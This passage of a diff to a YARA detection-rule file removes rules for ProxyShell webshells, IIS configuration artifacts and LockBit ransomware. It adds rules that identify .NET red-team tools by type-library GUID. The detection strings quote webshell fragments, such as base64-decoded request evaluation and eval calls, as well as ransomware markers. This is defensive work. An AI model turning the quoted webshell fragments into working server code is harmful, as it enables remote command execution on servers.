+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4539-L4553"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4ede197d482f0a9e553ba857b5049e7b7405e3df92460e19418fa0653c844982"
+		logic_hash = "8e97bf351c4c7507f3cf40a2d7aa36c60906a8069bb3644ce6ef05911a4d9a5c"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Page Language=" ascii nocase
+		$typelibguid0lo = "d5688068-fc89-467d-913f-037a785caca7" ascii wide
+		$typelibguid0up = "D5688068-FC89-467D-913F-037A785CACA7" ascii wide
 
 	condition:
-		uint32( 0 ) == 0x4e444221 and filesize < 2MB and $s1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Proxyshell_Aug21_3 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Adsearch : FILE
 {
 	meta:
-		description = "Detects webshells dropped by ProxyShell exploitation based on their file header (must be DER), size and content"
-		author = "Max Altgelt"
-		id = "a7bca62b-c8f1-5a38-81df-f3d4582a590b"
-		date = "2021-08-23"
-		modified = "2025-03-21"
-		reference = "https://twitter.com/gossithedog/status/1429175908905127938?s=12"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L51-L65"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "399ea06d-b36a-542b-bccc-8e8f935a35c6"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/tomcarver16/ADSearch"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4555-L4569"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f071aaa8918b359f786f2ac7447eeaedb5a6fca9e0a0c0e8820e011244424503"
+		logic_hash = "a35da6c6a396669928693b7d408f7d1021a7afc41dabfe521105254d69f23474"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Page Language=" ascii nocase
+		$typelibguid0lo = "4da5f1b7-8936-4413-91f7-57d6e072b4a7" ascii wide
+		$typelibguid0up = "4DA5F1B7-8936-4413-91F7-57D6E072B4A7" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x8230 and filesize < 10KB and $s1
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Proxyshell_Sep21_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Privilege_Escalation_Awesome_Scripts_Suite : FILE
 {
 	meta:
-		description = "Detects webshells dropped by ProxyShell exploitation based on their file header (must be PST) and base64 decoded request"
-		author = "Tobias Michalski"
-		id = "d0d23e17-6b6a-51d1-afd9-59cc2404bcd8"
-		date = "2021-09-17"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L67-L81"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "fa218dfa-4b56-5a62-b149-63394bd0b604"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4571-L4585"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "219468c10d2b9d61a8ae70dc8b6d2824ca8fbe4e53bbd925eeca270fef0fd640"
-		logic_hash = "233ec15dff8da5f2beaa931eb06849aa37e548947c1068d688a1695d977605d8"
+		logic_hash = "a70cfe807cbba80e0bc79adcb7268b2c9b99c20c5f7454e2275712a1adbeb16c"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s = ".FromBase64String(Request["
+		$typelibguid0lo = "1928358e-a64b-493f-a741-ae8e3d029374" ascii wide
+		$typelibguid0up = "1928358E-A64B-493F-A741-AE8E3D029374" ascii wide
 
 	condition:
-		uint32( 0 ) == 0x4e444221 and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_APT_IIS_Config_Proxyshell_Artifacts : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_CVE_2020_1206_POC : FILE
 {
 	meta:
-		description = "Detects virtual directory configured in IIS pointing to a ProgramData folder (as found in attacks against Exchange servers in August 2021)"
-		author = "Florian Roth (Nextron Systems)"
-		id = "21888fc0-82c6-555a-9320-9cbb8332a843"
-		date = "2021-08-25"
-		modified = "2025-03-21"
-		reference = "https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L83-L106"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d70472f3-b19f-5097-bd70-99a7e7812ac4"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/ZecOps/CVE-2020-1206-POC"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4587-L4605"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a4557694629448d258b8b2fefc278e059217560e7a0ec3279863a16fb9b3989c"
-		score = 90
+		logic_hash = "2e6ae824a98945e75cb57ee64c6622aff498201b64b7a24424990e84406176a0"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "<site name=" ascii
-		$a2 = "<sectionGroup name=\"system.webServer\">" ascii
-		$sa1 = " physicalPath=\"C:\\ProgramData\\COM" ascii
-		$sa2 = " physicalPath=\"C:\\ProgramData\\WHO" ascii
-		$sa3 = " physicalPath=\"C:\\ProgramData\\ZING" ascii
-		$sa4 = " physicalPath=\"C:\\ProgramData\\ZOO" ascii
-		$sa5 = " physicalPath=\"C:\\ProgramData\\XYZ" ascii
-		$sa6 = " physicalPath=\"C:\\ProgramData\\AUX" ascii
-		$sa7 = " physicalPath=\"C:\\ProgramData\\CON\\" ascii
-		$sb1 = " physicalPath=\"C:\\Users\\All Users\\" ascii
+		$typelibguid0lo = "3523ca04-a12d-4b40-8837-1a1d28ef96de" ascii wide
+		$typelibguid0up = "3523CA04-A12D-4B40-8837-1A1D28EF96DE" ascii wide
+		$typelibguid1lo = "d3a2f24a-ddc6-4548-9b3d-470e70dbcaab" ascii wide
+		$typelibguid1up = "D3A2F24A-DDC6-4548-9B3D-470E70DBCAAB" ascii wide
+		$typelibguid2lo = "fb30ee05-4a35-45f7-9a0a-829aec7e47d9" ascii wide
+		$typelibguid2up = "FB30EE05-4A35-45F7-9A0A-829AEC7E47D9" ascii wide
 
 	condition:
-		filesize < 500KB and all of ( $a* ) and 1 of ( $s* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Proxyshell_Exploitation_Aug21_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Dinvoke : FILE
 {
 	meta:
-		description = "Detects unknown malicious loaders noticed in August 2021"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1fa563fc-c91c-5f4e-98f1-b895e1acb4f4"
-		date = "2021-08-25"
-		modified = "2025-03-21"
-		reference = "https://twitter.com/VirITeXplorer/status/1430206853733097473"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L108-L120"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f3b0ef47-a92c-5c5d-a9e2-09579fcb438e"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/TheWover/DInvoke"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4607-L4621"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8a2417bb85c7f91d98143d2f4c26d30416b3a01ba8abc1445ccfae5609825b4d"
-		score = 90
+		logic_hash = "3fac2563205327a173814141c035c8be78d43d8409db34954ac6027b3039d7c0"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = ");eval/*asf" ascii
+		$typelibguid0lo = "b77fdab5-207c-4cdb-b1aa-348505c54229" ascii wide
+		$typelibguid0up = "B77FDAB5-207C-4CDB-B1AA-348505C54229" ascii wide
 
 	condition:
-		filesize < 600KB and 1 of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_WEBSHELL_ASPX_Proxyshell_Aug15 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpchisel : FILE
 {
 	meta:
-		description = "Webshells iisstart.aspx and Logout.aspx"
-		author = "Moritz Oettle"
-		id = "b1e6c0f3-787f-59b8-8123-4045522047ca"
-		date = "2021-09-04"
-		modified = "2025-03-21"
-		reference = "https://github.com/hvs-consulting/ioc_signatures/tree/main/Proxyshell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L122-L146"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3b7e6703-ebe8-5a98-839f-7d0349ab483f"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/shantanu561993/SharpChisel"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4623-L4637"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7e2e2f9add5932d28074a252a8e326dd728442df28abc02e8d026d773dd4aa05"
+		logic_hash = "9df151164aa269c13a79d862c15cc75bd0bb4668753f282149c162bd63ece471"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$g1 = "language=\"JScript\"" ascii
-		$g2 = "function getErrorWord" ascii
-		$g3 = "errorWord" ascii
-		$g4 = "Response.Redirect" ascii
-		$g5 = "function Page_Load" ascii
-		$g6 = "runat=\"server\"" ascii
-		$g7 = "Request[" ascii
-		$g8 = "eval/*" ascii
-		$s1 = "AppcacheVer" ascii
-		$s2 = "clientCode" ascii
-		$s3 = "LaTkWfI64XeDAXZS6pU1KrsvLAcGH7AZOQXjrFkT816RnFYJQR" ascii
+		$typelibguid0lo = "f5f21e2d-eb7e-4146-a7e1-371fd08d6762" ascii wide
+		$typelibguid0up = "F5F21E2D-EB7E-4146-A7E1-371FD08D6762" ascii wide
 
 	condition:
-		filesize < 1KB and ( 1 of ( $s* ) or 4 of ( $g* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_WEBSHELL_Mailbox_Export_PST_Proxyshell_Aug26 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpscribbles : FILE
 {
 	meta:
-		description = "Webshells generated by an Mailbox export to PST and stored as aspx: 570221043.aspx 689193944.aspx luifdecggoqmansn.aspx"
-		author = "Moritz Oettle"
-		id = "6aea414f-d27c-5202-84f8-b8620782fc90"
-		date = "2021-09-04"
-		modified = "2025-03-21"
-		reference = "https://github.com/hvs-consulting/ioc_signatures/tree/main/Proxyshell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L148-L174"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "47125b76-9388-5372-8810-d198f623367a"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/V1V1/SharpScribbles"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4639-L4655"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "07acbf74a4bf169fc128cd085759f33e89917e217703b3c6557ba5f954822fd4"
-		score = 85
+		logic_hash = "7b592dc541b708e001f2576d9eb412ecc52879d514149e9f211f6357faff92fc"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "!BDN"
-		$g1 = "Page language=" ascii
-		$g2 = "<%@ Page" ascii
-		$g3 = "Request.Item[" ascii
-		$g4 = "\"unsafe\");" ascii
-		$g5 = "<%eval(" ascii
-		$g6 = "script language=" ascii
-		$g7 = "Request[" ascii
-		$s1 = "gold8899" ascii
-		$s2 = "exec_code" ascii
-		$s3 = "orangenb" ascii
+		$typelibguid0lo = "aa61a166-31ef-429d-a971-ca654cd18c3b" ascii wide
+		$typelibguid0up = "AA61A166-31EF-429D-A971-CA654CD18C3B" ascii wide
+		$typelibguid1lo = "0dc1b824-c6e7-4881-8788-35aecb34d227" ascii wide
+		$typelibguid1up = "0DC1B824-C6E7-4881-8788-35AECB34D227" ascii wide
 
 	condition:
-		filesize < 500KB and $x1 at 0 and ( 1 of ( $s* ) or 3 of ( $g* ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_IIS_Config_Proxyshell_Artifacts : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpreg : FILE
 {
 	meta:
-		description = "Detects suspicious virtual directory configured in IIS pointing to a ProgramData folder (as found in attacks against Exchange servers in August 2021)"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bde65d9e-b17d-5746-8d29-8419363d0511"
-		date = "2021-08-25"
-		modified = "2025-03-21"
-		reference = "https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L181-L196"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "d89b07b0-bb29-5c77-888b-322e439b4c82"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/jnqpblc/SharpReg"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4657-L4671"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f2822a2b762c8e683c5e3a3f4a8232faa187b9a36182ea71e5286158b0e8115c"
-		score = 70
+		logic_hash = "dfe9189c215c090bc32dedfb0d01964409265a4da4e4f8c4a2ed9ee62b1c9b30"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "<site name=" ascii
-		$a2 = "<sectionGroup name=\"system.webServer\">" ascii
-		$s1 = " physicalPath=\"C:\\ProgramData\\" ascii
+		$typelibguid0lo = "8ef25b00-ed6a-4464-bdec-17281a4aa52f" ascii wide
+		$typelibguid0up = "8EF25B00-ED6A-4464-BDEC-17281A4AA52F" ascii wide
 
 	condition:
-		filesize < 500KB and all of ( $a* ) and 1 of ( $s* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_IIS_Config_Virtualdir : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Memevm : FILE
 {
 	meta:
-		description = "Detects suspicious virtual directory configured in IIS pointing to a User folder"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cfe5ca5e-a0cc-5f60-84d2-1b0538e999c7"
-		date = "2021-08-25"
-		modified = "2022-09-17"
-		reference = "https://www.huntress.com/blog/rapid-response-microsoft-exchange-servers-still-vulnerable-to-proxyshell-exploit"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L198-L218"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "c98d84d5-4b0a-53df-b8d4-0b360930eb0c"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/TobitoFatitoRE/MemeVM"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4673-L4691"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0b9be085957f368bc1890c42e3f1e8b974eed8c77ecb4d2ba6add4d877a9b488"
-		score = 60
+		logic_hash = "7430b5d82012fc63459d97a21d93260ccda7ac8249bf4b56384e3b0ab6b5548a"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$a1 = "<site name=" ascii
-		$a2 = "<sectionGroup name=\"system.webServer\">" ascii
-		$s2 = " physicalPath=\"C:\\Users\\" ascii
-		$fp1 = "Microsoft.Web.Administration" wide
-		$fp2 = "<virtualDirectory path=\"/\" physicalPath=\"C:\\Users\\admin\\"
+		$typelibguid0lo = "ef18f7f2-1f03-481c-98f9-4a18a2f12c11" ascii wide
+		$typelibguid0up = "EF18F7F2-1F03-481C-98F9-4A18A2F12C11" ascii wide
+		$typelibguid1lo = "77b2c83b-ca34-4738-9384-c52f0121647c" ascii wide
+		$typelibguid1up = "77B2C83B-CA34-4738-9384-C52F0121647C" ascii wide
+		$typelibguid2lo = "14d5d12e-9a32-4516-904e-df3393626317" ascii wide
+		$typelibguid2up = "14D5D12E-9A32-4516-904E-DF3393626317" ascii wide
 
 	condition:
-		filesize < 500KB and all of ( $a* ) and 1 of ( $s* ) and not 1 of ( $fp* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_SUSP_ASPX_Possibledropperartifact_Aug21 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpdir : FILE
 {
 	meta:
-		description = "Detects an ASPX file with a non-ASCII header, often a result of MS Exchange drop techniques"
-		author = "Max Altgelt"
-		id = "52016598-74a1-53d6-812a-40b078ba0bb9"
-		date = "2021-08-23"
-		modified = "2025-03-21"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L220-L250"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f64ed564-d198-59e8-9abe-b2814b95c85f"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/jnqpblc/SharpDir"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4693-L4707"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7e2fc61897ed859d5165aca7360d8a27891f842a7a8e4894af3926427ac95ceb"
-		score = 60
+		logic_hash = "23eb7b88f9685457a6cdaa8161fcbc6ea60634a4f01c67a4a1307618a6f8fa14"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Page Language=" ascii nocase
-		$fp1 = "Page Language=\"java\"" ascii nocase
+		$typelibguid0lo = "c7a07532-12a3-4f6a-a342-161bb060b789" ascii wide
+		$typelibguid0up = "C7A07532-12A3-4F6A-A342-161BB060B789" ascii wide
 
 	condition:
-		filesize < 500KB and not uint16( 0 ) == 0x4B50 and not uint16( 0 ) == 0x6152 and not uint16( 0 ) == 0x8b1f and not uint16( 0 ) == 0x5A4D and not uint16( 0 ) == 0xCFD0 and not uint16( 0 ) == 0xC3D4 and not uint16( 0 ) == 0x534D and all of ( $s* ) and not 1 of ( $fp* ) and ( ( ( uint8( 0 ) < 0x20 or uint8( 0 ) > 0x7E ) and uint8( 0 ) != 0x9 and uint8( 0 ) != 0x0D and uint8( 0 ) != 0x0A and uint8( 0 ) != 0xEF ) or ( ( uint8( 1 ) < 0x20 or uint8( 1 ) > 0x7E ) and uint8( 1 ) != 0x9 and uint8( 1 ) != 0x0D and uint8( 1 ) != 0x0A and uint8( 1 ) != 0xBB ) or ( ( uint8( 2 ) < 0x20 or uint8( 2 ) > 0x7E ) and uint8( 2 ) != 0x9 and uint8( 2 ) != 0x0D and uint8( 2 ) != 0x0A and uint8( 2 ) != 0xBF ) or ( ( uint8( 3 ) < 0x20 or uint8( 3 ) > 0x7E ) and uint8( 3 ) != 0x9 and uint8( 3 ) != 0x0D and uint8( 3 ) != 0x0A ) or ( ( uint8( 4 ) < 0x20 or uint8( 4 ) > 0x7E ) and uint8( 4 ) != 0x9 and uint8( 4 ) != 0x0D and uint8( 4 ) != 0x0A ) or ( ( uint8( 5 ) < 0x20 or uint8( 5 ) > 0x7E ) and uint8( 5 ) != 0x9 and uint8( 5 ) != 0x0D and uint8( 5 ) != 0x0A ) or ( ( uint8( 6 ) < 0x20 or uint8( 6 ) > 0x7E ) and uint8( 6 ) != 0x9 and uint8( 6 ) != 0x0D and uint8( 6 ) != 0x0A ) or ( ( uint8( 7 ) < 0x20 or uint8( 7 ) > 0x7E ) and uint8( 7 ) != 0x9 and uint8( 7 ) != 0x0D and uint8( 7 ) != 0x0A ) )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_WEBSHELL_Proxyshell_Exploitation_Nov21_1
+rule SIGNATURE_BASE_HKTL_NET_GUID_Atyourservice : FILE
 {
 	meta:
-		description = "Detects webshells dropped by DropHell malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "300eaadf-db0c-5591-84fc-abdf7cdd90c1"
-		date = "2021-11-01"
-		modified = "2025-03-21"
-		reference = "https://www.deepinstinct.com/blog/do-not-exchange-it-has-a-shell-inside"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_proxyshell.yar#L252-L266"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "3077dd0c-6936-5340-8da9-e8643de4d864"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/mitchmoser/AtYourService"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4709-L4723"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d9812d3f53c346c4e318609e0c7de66811b27ffa7528a6ddeb6ac8436da59ef5"
-		score = 85
+		logic_hash = "3e473ebb7e01cdc2edb9a20ba5ace39fd69629fb04d83510bc7855696c9ae581"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s01 = ".LoadXml(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(Request[" ascii wide
-		$s02 = "new System.IO.MemoryStream()" ascii wide
-		$s03 = "Transform(" ascii wide
+		$typelibguid0lo = "bc72386f-8b4c-44de-99b7-b06a8de3ce3f" ascii wide
+		$typelibguid0up = "BC72386F-8B4C-44DE-99B7-B06A8DE3CE3F" ascii wide
 
 	condition:
-		all of ( $s* )
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule SIGNATURE_BASE_MAL_RANSOM_LNX_Macos_Lockbit_Apr23_1 : FILE
+rule SIGNATURE_BASE_HKTL_NET_GUID_Lockless : FILE
 {
 	meta:
-		description = "Detects LockBit ransomware samples for Linux and macOS"
-		author = "Florian Roth"
-		id = "c01cb907-7d30-5487-b908-51f69ddb914c"
-		date = "2023-04-15"
-		modified = "2023-12-05"
-		reference = "https://twitter.com/malwrhunterteam/status/1647384505550876675?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lockbit_lnx_macos_apr23.yar#L2-L41"
+		description = "Detects .NET red/black-team tools via typelibguid"
+		author = "Arnim Rupp (https://github.com/ruppde)"
+		id = "f9b31f57-d721-5b6c-be63-b8309cba788a"
+		date = "2021-01-21"
+		modified = "2023-04-06"
+		reference = "https://github.com/GhostPack/LockLess"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L4725-L4739"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6d838e8b207b97d7c335dc4066de2c6dc87f7adc9cac31742677edbe85386cf7"
-		score = 85
+		logic_hash = "b3f929e2a7ee7f3b82cafcffe89572e210ca817edeb261810b9a2191ba308c3d"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "0a2bffa0a30ec609d80591eef1d0994d8b37ab1f6a6bad7260d9d435067fb48e"
-		hash2 = "9ebcbaf3c9e2bbce6b2331238ab584f95f7ced326ca4aba2ddcc8aa8ee964f66"
-		hash3 = "a405d034c01a357a89c9988ffe8a46a165915df18fd297469b2bcaaf97578442"
-		hash4 = "c9cac06c9093e9026c169adc3650b018d29c8b209e3ec511bbe34cbe1638a0d8"
-		hash5 = "dc3d08480f5e18062a0643f9c4319e5c3f55a2e7e93cd8eddd5e0c02634df7cf"
-		hash6 = "e77124c2e9b691dbe41d83672d3636411aaebc0aff9a300111a90017420ff096"
-		hash7 = "0be6f1e927f973df35dad6fc661048236d46879ad59f824233d757ec6e722bde"
-		hash8 = "3e4bbd21756ae30c24ff7d6942656be024139f8180b7bddd4e5c62a9dfbd8c79"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "restore-my-files.txt" ascii fullword
-		$s1 = "ntuser.dat.log" ascii fullword
-		$s2 = "bootsect.bak" ascii fullword
-		$s3 = "autorun.inf" ascii fullword
-		$s4 = "lockbit" ascii fullword
-		$xc1 = { 33 38 36 00 63 6D 64 00 61 6E 69 00 61 64 76 00 6D 73 69 00 6D 73 70 00 63 6F 6D 00 6E 6C 73 }
-		$xc2 = { 6E 74 6C 64 72 00 6E 74 75 73 65 72 2E 64 61 74 2E 6C 6F 67 00 62 6F 6F 74 73 65 63 74 2E 62 61 6B }
-		$xc3 = { 76 6D 2E 73 74 61 74 73 2E 76 6D 2E 76 5F 66 72 65 65 5F 63 6F 75 6E 74 00 61 2B 00 2F 2A }
-		$op1 = { 84 e5 f0 00 f0 e7 10 40 2d e9 2e 10 a0 e3 00 40 a0 e1 ?? fe ff }
-		$op2 = { 00 90 a0 e3 40 20 58 e2 3f 80 08 e2 3f 30 c2 e3 09 20 98 e1 08 20 9d }
-		$op3 = { 2d e9 01 70 43 e2 07 00 13 e1 01 60 a0 e1 08 d0 4d e2 02 40 }
+		$typelibguid0lo = "a91421cb-7909-4383-ba43-c2992bbbac22" ascii wide
+		$typelibguid0up = "A91421CB-7909-4383-BA43-C2992BBBAC22" ascii wide
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16( 0 ) == 0xfeca or uint16( 0 ) == 0xfacf or uint32( 0 ) == 0xbebafeca ) and ( 1 of ( $x* ) or 3 of them ) or 2 of ( $x* ) or 5 of them
